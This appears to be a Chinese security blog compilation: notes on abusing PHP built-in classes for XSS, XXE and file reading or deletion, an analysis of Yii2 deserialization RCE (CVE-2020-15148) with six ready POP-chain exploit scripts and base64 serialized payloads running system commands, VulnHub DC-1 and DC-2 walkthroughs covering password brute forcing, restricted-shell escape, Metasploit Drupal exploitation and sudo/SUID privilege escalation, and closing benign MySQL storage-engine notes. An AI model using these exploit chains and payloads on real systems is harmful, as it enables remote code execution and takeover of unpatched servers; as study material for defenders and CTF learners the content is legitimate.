通过内置__toString()魔术方法触发。

Demo

    $a = unserialize($_GET['a']);    echo $a;

Error Class Exp

    $a = new Error("");    echo urlencode(serialize($a));    #注意版本是PHP7

Payload

O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A52%3A%22D%3A%5CDesktopFolder%5CCode%5CPhpCode%5CPhpStorm%5Ctest%5Ctest.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D

Exception Class Exp

　　$a = new Exception("");　　echo urlencode(serialize($a));?>

Payload

O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A52%3A%22D%3A%5CDesktopFolder%5CCode%5CPhpCode%5CPhpStorm%5Ctest%5Ctest.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

SimpleXMLElement

XXE

range：(PHP 5, PHP 7, PHP 8)

利用实例化该类的对象来传入xml代码进行xxe攻击，进而读取文件内容和命令执行。

payload

$xml = <<<EOF<?xml version="1.0" encoding="utf-8" ?>DOCTYPE ANY [    %remote;]>]><x>&xeex>EOF;$xml_class = new SimpleXMLElement($xml, LIBXML_NOENT);var_dump($xml_class);?>

SPL File Class

可遍历目录类

DirectoryIterator

range：(PHP 5, PHP 7, PHP 8)

highlight_file(__file__);$dir = $_GET['cmd'];$a = new DirectoryIterator($dir);foreach($a as $f){    echo($f->__toString().'
');// 不加__toString()也可,因为echo可以自动调用}?>

FilesystemIterator

range：(PHP 5 >= 5.3.0, PHP 7, PHP 8)

highlight_file(__file__);$dir = $_GET['cmd'];$a = new FilesystemIterator($dir);foreach($a as $f){    echo($f->__toString().'
');}#payload : cmd=glob:///*

GlobIterator

range：(PHP 5 >= 5.3.0, PHP 7, PHP 8)

highlight_file(__file__);$dir = $_GET['cmd'];$a = new GlobIterator($dir);foreach($a as $f){    echo($f->__toString().'
');}#payload : cmd=glob:///*

可读取文件类

SplFileObject

highlight_file(__file__);$context = new SplFileObject('/etc/passwd');foreach($context as $f){    echo($f);}

ZipArchive::open()

可进行文件删除操作

range：PHP 5 >= 5.2.0, PHP 7, PHP 8, PECL zip >= 1.1.0

ZipArchive {    /* 方法 */    public addEmptyDir ( string $dirname , int $flags = 0 ) : bool    public addFile ( string $filepath , string $entryname = "" , int $start = 0 , int $length = 0 , int $flags = ZipArchive::FL_OVERWRITE ) : bool    public addFromString ( string $name , string $content , int $flags = ZipArchive::FL_OVERWRITE ) : bool    public addGlob ( string $pattern , int $flags = 0 , array $options = [] ) : array|false    public addPattern ( string $pattern , string $path = "." , array $options = [] ) : array|false    public close ( ) : bool    public count ( ) : int    public deleteIndex ( int $index ) : bool    public deleteName ( string $name ) : bool    extractTo ( string $destination , mixed $entries = ? ) : bool    public getArchiveComment ( int $flags = 0 ) : string|false    public getCommentIndex ( int $index , int $flags = 0 ) : string|false    public getCommentName ( string $name , int $flags = 0 ) : string|false    public GetExternalAttributesIndex ( int $index , int &$opsys , int &$attr , int $flags = ? ) : bool    public getExternalAttributesName ( string $name , int &$opsys , int &$attr , int $flags = 0 ) : bool    public getFromIndex ( int $index , int $len = 0 , int $flags = 0 ) : string|false    public getFromName ( string $name , int $len = 0 , int $flags = 0 ) : string|false    public getNameIndex ( int $index , int $flags = 0 ) : string|false    public getStatusString ( ) : string    public getStream ( string $name ) : resource|false    public static isCompressionMethodSupported ( int $method , bool $enc = true ) : bool    public static isEncryptionMethodSupported ( int $method , bool $enc = true ) : bool    public locateName ( string $name , int $flags = 0 ) : int|false    public open ( string $filename , int $flags = 0 ) : bool|int    public registerCancelCallback ( callable $callback ) : bool    public registerProgressCallback ( float $rate , callable $callback ) : bool    public renameIndex ( int $index , string $new_name ) : bool    public renameName ( string $name , string $new_name ) : bool    public replaceFile ( string $filepath , string $index , int $start = 0 , int $length = 0 , int $flags = 0 ) : bool    public setArchiveComment ( string $comment ) : bool    public setCommentIndex ( int $index , string $comment ) : bool    public setCommentName ( string $name , string $comment ) : bool    public setCompressionIndex ( int $index , int $method , int $compflags = 0 ) : bool    public setCompressionName ( string $name , int $method , int $compflags = 0 ) : bool    public setEncryptionIndex ( int $index , int $method , string|null $password = null ) : bool    public setEncryptionName ( string $name , int $method , string|null $password = null ) : bool    public setExternalAttributesIndex ( int $index , int $opsys , int $attr , int $flags = 0 ) : bool    public setExternalAttributesName ( string $name , int $opsys , int $attr , int $flags = 0 ) : bool    public setMtimeIndex ( int $index , int $timestamp , int $flags = 0 ) : bool|null    public setMtimeName ( string $name , int $timestamp , int $flags = 0 ) : bool|null    public setPassword ( string $password ) : bool    public statIndex ( int $index , int $flags = 0 ) : array|false    public statName ( string $name , int $flags = 0 ) : array|false    public unchangeAll ( ) : bool    public unchangeArchive ( ) : bool    public unchangeIndex ( int $index ) : bool    public unchangeName ( string $name ) : bool}

use：ZipArchive::open ( string $filename [, int $flags ] ) : mixed

flags：The mode to use to open the archive.

ZipArchive::OVERWRITE：总是以一个新的压缩包开始，此模式下如果已经存在则会被覆盖。
ZipArchive::CREATE：如果不存在则创建一个zip压缩包。
ZipArchive::RDONLY：只读模式打开压缩包。 PHP>7.4.3, PECL zip>1.17.1
ZipArchive::EXCL：如果压缩包已经存在，则出错。
ZipArchive::CHECKCONS：对压缩包执行额外的一致性检查，如果失败则显示错误。

Demo

$a = new ZipArchive();$a->open('1.txt',ZipArchive::OVERWRITE);

目录下的1.txt将会被删除

Reflection

注释读取

range：(PHP 5, PHP 7, PHP 8)

方法参考：https://www.php.net/manual/zh/book.reflection.php

Example Class

class Apple {    public $var1;    public $var2 = 'Orange';    /**     * This is DocComment     */    public function type() {        return 'Apple';    }}

利用php反射类来进行操作

ReflectionMethod继承ReflectionFunctionAbstract这个抽象类，这个抽象类实现Reflector接口

ReflectionFunctionAbstract中有一个getDocComment方法，用以获取函数的注释文本，注释文本需符合/**开头的规范否则无法识别

$ref = new ReflectionMethod("Apple","type");var_dump($ref->getDocComment());string(39) "/**     * This is DocComment     */"

同时这里还有一个ReflectionFunction

[new ReflectionFunction('system'),invokeArgs](array('aaa.txt'=>'dir'));可执行函数调用

invokeArgs(args)：The passed arguments to the function as an array, much like call_user_func_array() works.

Reference

Yii2反序列化漏洞(CVE-2020-15148)分析学习

2021-05-13T13:22:30.000Z

Yii2介绍

Yii 是一个高性能，基于组件的 PHP 框架，用于快速开发现代 Web 应用程序。即可以用于开发各种用 PHP 构建的 Web 应用。因为基于组件的框架结构和设计精巧的缓存支持，它特别适合开发大型应用，如门户网站、社区、内容管理系统（CMS）、电子商务项目和 RESTful Web 服务等。

影响范围

Yii2 < 2.0.38

2.0.38已修复，官方给yii\db\BatchQueryResult类加了一个__wakeup()函数，__wakeup方法在类被反序列化时会自动被调用，而这里这么写，目的就是在当BatchQueryResult类被反序列化时就直接报错，避免反序列化的发生，也就避免了漏洞。

https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99

环境复现

直接上github将app下载下来解压

https://github.com/yiisoft/yii2/releases/tag/2.0.37

本地web环境使用phpstudy集成环境搭建，使用phpstorm进行xdebug调试

php version：7.4.3nts，Apache version：2.4.39

修改config\web.php中的cookieValidationKey为任意值，作为yii\web\Request::cookieValidationKey的加密值，不设置会报错

接着自己添加一个controller来进行漏洞的利用，创建一个action：http://url/index.php?r=test/test, controllers的命名是： 名称Controller，action的命名是： action名称，如下

controllers/TestController.php

namespace app\controllers;use yii\web\Controller;class TestController extends Controller{    public function actionTest($data){        return unserialize(base64_decode($data));    }}

发包测试，环境搭建成功

CVE漏洞分析

POP1

从yii\db\BatchQueryResult这个类入手，提起主要代码分析：

public function __destruct(){    // make sure cursor is closed    $this->reset();}public function reset(){    if ($this->_dataReader !== null) {        $this->_dataReader->close();    }    $this->_dataReader = null;    $this->_batch = null;    $this->_value = null;    $this->_key = null;}

可以看到，__destruct调用了reset方法reset调用了close方法，参数_dataReader可控，学习思路后知道这里可以通过触发__call方法来进行利用

__call：当一个对象在对象上下文中调用不可访问的方法时触发

当一个对象调用不可访问的close方法或者类中压根就没有close方法，即可触发__call，全局搜索__call方法

找到其中一个Faker/Generator.php类，跟进查看代码

public function __call($method, $attributes){    return $this->format($method, $attributes);}public function format($formatter, $arguments = array()){    return call_user_func_array($this->getFormatter($formatter), $arguments);}public function getFormatter($formatter){    if (isset($this->formatters[$formatter])) {        return $this->formatters[$formatter];    }    foreach ($this->providers as $provider) {        if (method_exists($provider, $formatter)) {            $this->formatters[$formatter] = array($provider, $formatter);            return $this->formatters[$formatter];        }    }    throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));}

__call方法调用了类中的format方法，format方法里的call_user_func_array里的参数调用了getFormatter方法

call_user_func_array：调用回调函数，并把一个数组参数作为回调函数的参数

大致使用方法如下

function foobar($arg, $arg2) {    echo __FUNCTION__, " got $arg and $arg2\n";}class foo {    function bar($arg, $arg2) {        echo __METHOD__, " got $arg and $arg2\n";    }}// Call the foobar() function with 2 argumentscall_user_func_array("foobar", array("one", "two"));// Call the $foo->bar() method with 2 arguments$foo = new foo;call_user_func_array(array($foo, "bar"), array("three", "four"));?>

getFormatter方法从$this->$formatter中取值，$this->formatter可控，所以这里可以调用任意类中的任意方法了。Debug如下

但是$arguments是从yii\db\BatchQueryResult::reset()里传过来的，我们不可控，比如这里就为空，因为传来的close方法中参参数值，所以我们只能不带参数地去调用别的类中的方法。

到这一步就需要一个执行类，这时需要类中的方法需要满足两个条件

方法所需的参数只能是其自己类中存在的（即参数：$this->args）
方法需要有命令执行功能

通过全局查找正则匹配call_user_func\(\$this->([a-zA-Z0-9]+), \$this->([a-zA-Z0-9]+)来查找，结果如下

call_user_func：把第一个参数作为回调函数调用,这里用call_user_func即可达到命令执行的效果也可以达到RCE的效果

大致使用方法如下

error_reporting(E_ALL);function increment(&$var){    $var++;}$a = 0;call_user_func('increment', $a);echo $a."\n";call_user_func_array('increment', array(&$a)); // You can use this instead before PHP 5.3echo $a."\n";?>

其中有两个类中的run方法可用

yii\rest\CreateAction::run()，$this->checkAccess, $this->id两个参数可控

public function run(){    if ($this->checkAccess) {        call_user_func($this->checkAccess, $this->id);    }    ......        return $model;}

\yii\rest\IndexAction::run()，$this->checkAccess, $this->id两个参数可控

public function run(){    if ($this->checkAccess) {        call_user_func($this->checkAccess, $this->id);    }    return $this->prepareDataProvider();}

于是即可构造完整的pop链

yii\db\BatchQueryResult::__destruct()->reset()->close()->Faker\Generator::__call()->format()->call_user_func_array()->\yii\rest\IndexAction::run->call_user_func()

Exp

namespace yii\rest{    class IndexAction{        public $checkAccess;        public $id;        public function __construct(){            $this->checkAccess = 'system';            $this->id = 'whoami';           //command        }    }}namespace Faker{    use yii\rest\IndexAction;    class Generator{        protected $formatters;        public function __construct(){            $this->formatters['close'] = [new IndexAction, 'run'];        }    }}namespace yii\db{    use Faker\Generator;    class BatchQueryResult{        private $_dataReader;        public function __construct(){            $this->_dataReader = new Generator;        }    }}namespace{    echo base64_encode(serialize(new yii\db\BatchQueryResult));    //TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo2OiJzeXN0ZW0iO3M6MjoiaWQiO3M6Njoid2hvYW1pIjt9aToxO3M6MzoicnVuIjt9fX19}?>

命令执行结果如下

POP2

还是从yii2/db/BatchQueryResult.php入手，换种思路，我们不找__call方法来触发，直接找close方法

随后我们找到一个FnStream.php在vendor\guzzlehttp\psr7\src目录下，代码如下

public function close(){    return call_user_func($this->_fn_close);}

$this->_fn_close可控

Exp

namespace GuzzleHttp\Psr7 {    class FnStream {        var $_fn_close = "phpinfo";    }}namespace yii\db {    use GuzzleHttp\Psr7\FnStream;    class BatchQueryResult {        private $_dataReader;        public function __construct() {            $this->_dataReader  = new FnStream();        }    }    $b = new BatchQueryResult();    print_r(base64_encode(serialize($b)));    //TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoyNDoiR3V6emxlSHR0cFxQc3I3XEZuU3RyZWFtIjoxOntzOjk6Il9mbl9jbG9zZSI7czo3OiJwaHBpbmZvIjt9fQ==}

执行效果如下：

我们需要对危害进行放大，这里就需要一个执行类，拿这个call_user_func函数作跳板，来进行代码执行，全局搜索eval，找到一个MockTrait.php文件在vendor\phpunit\phpunit\src\Framework\MockObject下，代码如下：

public function generate(): string{    if (!\class_exists($this->mockName, false)) {        eval($this->classCode);    }    return $this->mockName;}

$this->classCode和$this->mockName都可控

于是即可构造完整的pop链

yii\db\BatchQueryResult::__destruct()->reset()->close()->GuzzleHttp\Psr7\FnStream::close()->call_user_func->PHPUnit\Framework\MockObject\MockTrait::generate->eval()

Exp

namespace PHPUnit\Framework\MockObject{    class MockTrait {        private $classCode = "system('whoami');";        private $mockName = "extrader";    }}namespace GuzzleHttp\Psr7 {    use PHPUnit\Framework\MockObject\MockTrait;    class FnStream {        var $_fn_close;        function __construct(){            $this->_fn_close = array(                new MockTrait(),                'generate'            );        }    }}namespace yii\db {    use GuzzleHttp\Psr7\FnStream;    class BatchQueryResult {        private $_dataReader;        public function __construct() {            $this->_dataReader  = new FnStream();        }    }    $b = new BatchQueryResult();    print_r(base64_encode(serialize($b)));}

然而代码并没有执行成功，看到报错信息

__wakeup方法throw出去了，当然__wakeup可绕，前提是PHP5 < 5.6.25，7.x < 7.0.10之前，具体绕过方法网上很多，这里不再赘述，执行效果如下

paylaod:

TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoyNDoiR3V6emxlSHR0cFxQc3I3XEZuU3RyZWFtIjoyOntzOjk6Il9mbl9jbG9zZSI7YToyOntpOjA7TzozODoiUEhQVW5pdFxGcmFtZXdvcmtcTW9ja09iamVjdFxNb2NrVHJhaXQiOjI6e3M6NDk6IgBQSFBVbml0XEZyYW1ld29ya1xNb2NrT2JqZWN0XE1vY2tUcmFpdABjbGFzc0NvZGUiO3M6MTc6InN5c3RlbSgnd2hvYW1pJyk7IjtzOjQ4OiIAUEhQVW5pdFxGcmFtZXdvcmtcTW9ja09iamVjdFxNb2NrVHJhaXQAbW9ja05hbWUiO3M6ODoiZXh0cmFkZXIiO31pOjE7czo4OiJnZW5lcmF0ZSI7fX19

这里就疑惑了，我这里php明明是php7.4的环境，为什么也可以绕？？？

既然__wakeup可绕，那2.0.38版本修复的方法就是加一个__wakeup方法，是不是也可以直接绕？在github上又把2.0.38版本的源码下下来，然后用构造好的绕过__wakeup的payload测试，直接没回显了，报错也没了，有点迷，有点迷。。。

2.0.38反序列化

此处参考链接，师傅很强，学习了！

POP3

利用点在vendor/codeception/codeception/ext/RunProcess.php:93

里面有这两个方法

public function __destruct(){    $this->stopProcess();}public function stopProcess(){    foreach (array_reverse($this->processes) as $process) {        /** @var $process Process  **/        if (!$process->isRunning()) {            continue;        }        $this->output->debug('[RunProcess] Stopping ' . $process->getCommandLine());        $process->stop();    }    $this->processes = [];}

对象在销毁的时候，触发__destruct方法，__destruct方法调用了stopProcess方法，stopProcess方法中的$this->processes可控，即$process也可控，$process会调用isRunning()方法，那么这里就可以尝试利用__call方法了，可以接着上面的POP1链利用

完整的pop链如下：

\Codeception\Extension\RunProcess::__destruct()->stopProcess()->$process->isRunning()->Faker\Generator::__call()->format()->call_user_func_array()->\yii\rest\IndexAction::run->call_user_func()

Exp

// EXP3: RunProcess -> ... -> __call()namespace yii\rest{    class IndexAction{        public $checkAccess;        public $id;        public function __construct(){            $this->checkAccess = 'system';            $this->id = 'ls -al';           //command            // run() -> call_user_func($this->checkAccess, $this->id);        }    }}namespace Faker{    use yii\rest\IndexAction;    class Generator{        protected $formatters;        public function __construct(){            $this->formatters['isRunning'] = [new IndexAction, 'run'];            //stopProcess方法里又调用了isRunning()方法: $process->isRunning()        }    }}namespace Codeception\Extension{    use Faker\Generator;    class RunProcess{        private $processes;        public function __construct()        {            $this->processes = [new Generator()];        }    }}namespace{    use Codeception\Extension\RunProcess;    echo base64_encode(serialize(new RunProcess()));}?>

请求结果如下，成功命令执行

POP4

利用点在vendor\swiftmailer\swiftmailer\lib\classes\Swift\KeyCache\DiskKeyCache.php中

主要代码如下：

public function __destruct(){    foreach ($this->keys as $nsKey => $null) {        $this->clearAll($nsKey);    }}public function clearAll($nsKey){    if (array_key_exists($nsKey, $this->keys)) {        foreach ($this->keys[$nsKey] as $itemKey => $null) {            $this->clearKey($nsKey, $itemKey);        }        if (is_dir($this->path.'/'.$nsKey)) {            rmdir($this->path.'/'.$nsKey);        }        unset($this->keys[$nsKey]);    }}public function clearKey($nsKey, $itemKey){    if ($this->hasKey($nsKey, $itemKey)) {        $this->freeHandle($nsKey, $itemKey);        unlink($this->path.'/'.$nsKey.'/'.$itemKey);    }}

unlink使用拼接字符串，$this->path可控，即可想到调用__toString方法（当一个对象被当做字符串使用时被调用）

全局查找__toString()方法，最好找一些调用其他类函数的__toString

有如下的几个类中的__toString方法可用：

\Codeception\Util\XmlBuilder::__toString -> \DOMDocument::saveXML 可以触发__call方法\phpDocumentor\Reflection\DocBlock\Tags\Covers::__toString -> render 可以触发__call方法\phpDocumentor\Reflection\DocBlock\Tags\Deprecated::__toString -> render 可以触发__call方法\phpDocumentor\Reflection\DocBlock\Tags\Generic::__toString -> render 可以触发__call方法\phpDocumentor\Reflection\DocBlock\Tags\See::__toString -> render可以触发__call方法\phpDocumentor\Reflection\DocBlock\Tags\Link::__toString -> render...

这里以\Codeception\Util\XmlBuilder::__toString为例

public function __toString(){    return $this->__dom__->saveXML();}

$this->__dom__可控，在调用saveXML()方法的时候会调用__call方法。

pop链如下：

\Swift_KeyCache_DiskKeyCache::__destruct -> clearAll -> clearKey -> __toString-> \Codeception\Util\XmlBuilder::__toString -> saveXML-> Faker\Generator::__call()->format() -> call_user_func_array()->\yii\rest\IndexAction::run -> call_user_func()

Exp

// EXP: Swift_KeyCache_DiskKeyCache::__destruct -> __toString -> __callnamespace {    use Codeception\Util\XmlBuilder;    use phpDocumentor\Reflection\DocBlock\Tags\Covers;    class Swift_KeyCache_DiskKeyCache{        private $path;        private $keys;        public function __construct()        {            $this->keys = array(                "extrader" =>array("is", "am")            );  //注意 ClearAll中的数组解析了两次，之后再unlink            $this->path = new XmlBuilder();        }    }    $payload = new Swift_KeyCache_DiskKeyCache();    echo base64_encode(serialize($payload));}namespace Codeception\Util{    use Faker\Generator;    class XmlBuilder{        protected $__dom__;        public function __construct(){            $this->__dom__ = new Generator();        }    }}namespace phpDocumentor\Reflection\DocBlock\Tags{    use Faker\Generator;    class Covers{        private $refers;        protected $description;        public function __construct()        {            $this->description = new Generator();            $this->refers = "AnyStringisOK";        }    }}namespace yii\rest{    class IndexAction{        public $checkAccess;        public $id;        public function __construct(){            $this->checkAccess = 'system';            $this->id = 'whoami';           //command            // run() -> call_user_func($this->checkAccess, $this->id);        }    }}namespace Faker{    use yii\rest\IndexAction;    class Generator{        protected $formatters;        public function __construct(){            $this->formatters['saveXML'] = [new IndexAction, 'run'];        }    }}

发包，成功命令执行

2.0.42反序列化

202108月更新，补两条新利用链

POP5

Exp：

namespace Faker;class DefaultGenerator{    protected $default ;    function __construct($argv)    {        $this->default = $argv;    }}class ValidGenerator{    protected $generator;    protected $validator;    protected $maxRetries;    function __construct($command,$argv)    {        $this->generator = new DefaultGenerator($argv);        $this->validator = $command;        $this->maxRetries = 99999999;    }}namespace Codeception\Extension;use Faker\ValidGenerator;class RunProcess{    private $processes = [];    function __construct($command,$argv)    {        $this->processes[] = new ValidGenerator($command,$argv);    }}$exp = new RunProcess('system','whoami');echo(base64_encode(serialize($exp)));

pop链如下：

\Codeception\Extension\RunProcess::__destruct()->stopProcess()->$process->isRunning()->Faker\ValidGenerator::__call()->call_user_func_array()->call_user_func()->Faker\DefaultGenerator::__call()->$this->default

POP6

Exp：

namespace yii\rest{    class IndexAction{        function __construct()        {            $this->checkAccess = 'system';            $this->id = 'whoami';        }    }}namespace Symfony\Component\String{    use yii\rest\IndexAction;    class LazyString    {        function __construct()        {            $this->value = [new indexAction(), "run"];        }    }     class UnicodeString    {        function __construct()        {            $this->value = new LazyString();        }    }}namespace Faker{    use Symfony\Component\String\LazyString;    class DefaultGenerator    {        function __construct()        {            $this->default = new LazyString();        }    }    class UniqueGenerator    {        function __construct()        {            $this->generator = new DefaultGenerator();            $this->maxRetries = 99999999;        }    }}namespace Codeception\Extension{    use Faker\UniqueGenerator;    class RunProcess    {        function __construct()        {            $this->processes[] = new UniqueGenerator();        }    }}namespace{    use Codeception\Extension\RunProcess;    $exp = new RunProcess();    echo(base64_encode(serialize($exp)));}

pop链如下：

\Codeception\Extension\RunProcess::__destruct()->stopProcess()->$process->isRunning()->Faker\UniqueGenerator::__call()->call_user_func_array()->serialize()->Symfony\Component\String::__sleep()::__toString()::($this->value)()

小结

发现这几个pop链用来用去最后都是靠着__call方法来触发代码执行，代码审计的少，以后再遇到代码审计的问题可以多多考虑这一方面的东西
善于搜索，使用正则表达式，比如满足\$this->(\w+)->(\w+)这个正则的就可能可以触发__call方法
找链的开端可以尝试从__destruct入手，然后追链，追方法
call_user_func中的callback可以是数组
整个pop链下来还是学到不少东西的，慢慢来吧

参考

VulnHub-DC-2靶场练习

2021-05-02T13:45:30.000Z

靶机地址：192.168.99.150（DC-2）链接

渗透机：192.168.99.188（Kali）

物理主机：192.168.99.107（Windows10）

目标：尽可能拿到更多的flag，有5个

nmap主机发现：

访问80端口，发现是一个WordPress站点，首页有flag1，如下

似乎是让我们对用户进行爆破，但常规的密码字典里可能没有我们所需要的密码，于是采用Cewl进行密码信息搜集

cewl http://dc-2/ -m 3 -d 3 -e -v -w wppass.txt-m 最小单词长度-d：爬网深度-e：收集包含email地址信息-v：Verbose模式，该模式下，Cewl会导出目标网站的详细数据-w：保存字典文件

得到字典后使用wpscan对网站后台进行扫描测试

wpscan --url http://dc-2/ -e u -P /home/kali/msf_exp/wppass.txt-e: 枚举 u表示枚举用户-P: 爆破密码字典路径

拿到两个用户的用户名和密码

Username: jerry, Password: adipiscingUsername: tom, Password: parturient

登录后台，在page里拿到flag2

找其它的切入点，前面nmap在0-1000的端口中只扫到了一个80端口，加大力度，改成0-10000

扫到一个7744的ssh端口，tom用户连上使用wp的后台密码即可登录，jerry不行，可能不是这个密码，也可能jerry不允许ssh登录

登录目录下找到flag3，less查看

随后尝试很多命令用不了，当前目录下的usr目录也进不去，查看当前目录下所有文件，查看.bash_history

ls -al usr/bin

有四个命令可以用，并且使用的是rbash，一个功能受限的bash，限制性可能会有如下

使用命令cd更改目录
设置或者取消环境变量的设置（SHELL, PATH, ENV, or BASH_ENV）
指定包含参数'/'的文件名
指定包含参数' - '的文件名
使用重定向输出'>', '>>', '> |', '<>' '>&','&>'

使用scp绕过

还可以这样

也可以用vi，方法不唯一，搬张图，可参考文末的链接

在jerry的用户目录下找到flag4.txt

you're on your own now. :-)，线索git

配置当前shell环境变量

export PATH=$PATH:/bin/export PATH=$PATH:/usr/bin

大部分命令可用了

根据flag3的提示，su切换到jerry，密码就是上面的密码，sudo -l看看用户可以用sudo运行一些命令

git可用，git提权

sudo git help config  在末行命令模式输入 !/bin/bash 或 !'sh'

成功拿到最后的flag

参考：

VulnHub-DC-1靶场练习

2021-05-01T13:20:30.000Z

靶机使用VMware搭建，网络为桥接模式，也可使用NAT模式

操作不难，主要学思路和方法，老是看别人渗透操作感觉我上我也行，但实际上自己真正的来操作了就知道了，越到后面就越不知道从何入手。。。

靶机：192.168.99.170（DC-1），vulnhub地址

渗透机：192.168.99.188（Kali）

物理主机：192.168.99.107（Windows10）

目标：尽可能拿到更多的flag

nmap主机发现：

nmap -sP -PR 192.168.99.1/24-sP: Ping Scan - go no further than determining if host is online-PR: ARP Ping

找到靶机地址，对靶机端口进行扫描：

sudo nmap -T4 -A -sN 192.168.99.170-sN: TCP Null, FIN, and Xmas scans-A: Enables OS detection and Version detection

查看80端口有http服务开放，打开发现是一个Drupal站点，版本为Drupal 7，网上搜有18年的代码执行漏洞（CVE-2018-7600）

上msf，search drupal，用18年的

use exploit/unix/webapp/drupal_drupalgeddon2set RHOSTS 192.169.99.170exploit

成功弹回一个shell

查看系统信息sysinfo

进入系统shell，查看当前用户为www-data

搜集信息

拿到flag1，Every good CMS needs a config file - and so do you.，根据提示找配置文件

search -f setting* 或find . -type f | xargs grep "password"找setting开头的文件

download ./sites/default/settings.php /home/kali/下载下来看看

拿到flag2，数据库用户账号密码

dictionary attacks aren't theonly ways to gain access (and you WILL need access).What can you do with these credentials?'username' => 'dbuser','password' => 'R0ck3t',

python -c "import pty;pty.spawn('/bin/bash')"进入一个交互式的shell，为什么要用交互式shell，因为非交互shell无回显，详见

mysql -udbuser -pR0ck3t登录mysql命令行

select * from users \G;

admin密码加密的，这里有两个方法可以拿到后台管理员的账号

一个是把数据库中admin的密码给改成我们想要的密码，前提是要经过Drupal后端加密的才行

在网站根目录scripts找到加密脚本，参考

执行加密脚本php scripts/password-hash.sh 123456，得到123456加密后的密码$S$DO3Rg8SH1xaO3lXuF8sKc8905t0xwoMMO80Ikju//Ia1JwdtrWz5

在数据库中update管理员的密码，即可用更改后的密码登录

还有一种方法，searchsploit drupal发现Drupal 7.0 < 7.31版本存在SQL注入，可以直接添加管理员账号，详见

python 34992.py -t http://192.168.99.170 -u extrader -p 123456 即可添加管理员用户

登录后台

content里找到flag3

暗示shadow，cat /etc/passwd，发现flag4用户

在/home/flag4目录下找到flag4.txt文件

这里还可以用hydra爆破flag4的密码，虽然没啥用，学操作就够了

-l 指定用户名-P 加载密码字典（自定义)ssh://ip 指定使用协议和ip地址

Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy.  Or maybe it is?

意思要我们提权

suid提权

find / -perm -u=s -type f 2>/dev/null找到一个属于root的有s权限的文件

提权，在/root目录下拿到最终的flag

MySQL学习笔记

2021-04-09T05:17:01.000Z

MySQL存储引擎

存储引擎是MySQL组件，用于处理不同类型的SQL操作。

使用 SHOW ENGINES 语句查看服务器支持哪些存储引擎，Support列中表示是否可以使用，DEFAULT表示默认值。（下图版本为MySQL 5.7.26，Windows 10）

InnoDB 是默认的且用途最广的存储引擎，Oracle官方建议将其用于表（特殊用例除外）。（默认情况下，MySQL 5.7 or MySQL 8.0 中使用 CREATE TABLE 语句创建InnoDB表。）

InnoDB

事务型数据库的首选引擎，支持事务安全（ACID），具有提交（COMMIT），回滚（ROLLBACK）和奔溃恢复（crash-recovery）功能 InnoDB and the ACID Model

行级锁定和Oracle风格的一致读取可提高多用户的并发性和性能 InnoDB Locking and Transaction Model

InnoDB将数据存放在磁盘上，以基于主键优化查询，每个InnoDB表都有一个称为聚集索引（The Clustered Index）的主键索引，该索引组织数据以最小化主键查找I/O Clustered and Secondary Indexes

为了保持数据的完整性，InnoDB支持 FOREIGN KEY 约束，使用外键检查插入，更新和删除，以确保它们不会导致相关表之间的不一致。 FOREIGN KEY Constraints

ACID

原子性（Atomicity）
一个事务要么全部提交成功，要么全部回滚失败，不能只执行其中的一部分操作
一致性（Consistency）
事务的执行不能破坏数据库的完整性和一致性，在一个事务在执行前后，数据库都必须处于一致性状态，以防止数据崩溃
隔离性（Isolation）
在并发的环境中，并发事务是相互隔离的，并发执行的事务直接不能互相干扰
持久性（Durability）
一旦事务提交，则对应数据库中的数据状态的变更就会永久的保存到数据库中

一般来说，如果需要事务支持，并且有较高的并发读取频率，InnoDB首选

MyISAM

所有数据值首先存储在低字节中（The Low Byte First），这使得MyISAM独立于操作系统，可以轻松地将其从Windows服务器移植到Linux服务器

每个MyISAM表都以三个文件存储在磁盘上。这些文件具有以表名开头的名称，并具有用于指示文件类型的扩展名，.frm 文件存储表格式，.MYD（MYData）文件存储数据，.MYI（MYIndex）存储索引

支持并发插入，即适合在插入密集型表中使用，例如管理邮件或Web服务器日志数据

MyISAM存储引擎在筛选大量数据时非常迅速，适合插入密集型表

Memory

将所有数据存储在RAM中，以便在需要快速查找非关键数据的环境中进行快速访问，当mysqld守护进程崩溃时，所有的Memory数据都会丢失。

要求存储在Memory数据表里的数据使用的是长度不变的格式，不支持可变长度数据类型（包括BLOB和TEXT），VARCHAR是一种长度可变的类型，但因为它在MySQL内部当做长度固定不变的CHAR类型，所以可以使用。

